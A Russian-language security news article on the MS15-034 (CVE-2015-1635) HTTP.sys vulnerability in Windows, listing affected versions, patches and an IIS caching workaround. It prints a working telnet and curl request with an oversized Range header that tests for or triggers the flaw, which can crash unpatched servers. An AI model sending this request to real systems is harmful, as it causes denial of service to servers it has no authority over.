В сетевом стеке HTTP.sys для серверных Windows обнаружена критичная уязвимость, из-за которой HTTP.sys неправильно обрабатывает специальным образом составленные HTTP-запросы, вызывая DoS или удалённое исполнение кода.

Microsoft выпустила справочный бюллетень MS15-034, в котором присвоила уязвимости самый высокий уровень опасности и перечисляет подверженные ей операционные системы: Windows 7, Windows Server 2008 R2, Windows 8 и Windows 8.1, Windows Server 2012 и Windows Server 2012 R2,

Для всех указанных систем выпущены обновления безопасности. В качестве альтернативного решения можно отключить кэширования ядра IIS, хотя Microsoft признаёт, что это приведёт к проблемам с производительностью.

При получении такого запроса Windows выводит сообщение об ошибке, а компьютер прекращает работу со странным сообщением.

003

Независимые исследователи приводят код эксплоита. Он осуществляет сканирование системы, чтобы вызвать переполнение буфера и проверить, уязвима система или нет.

$ telnet 10.0.1.1 80
GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615

Это можно заменить командой curl.

$ curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

Вероятно, грамотная эксплуатация позволит запускать на уязвимой системе произвольный код. Этот факт упоминается и в бюллетене безопасности Microsoft.

Уязвимости присвоен классификатор CVE-2015-1635.

Онлайн-проверка серверов на наличие уязвимости

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    1 Комментарий
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии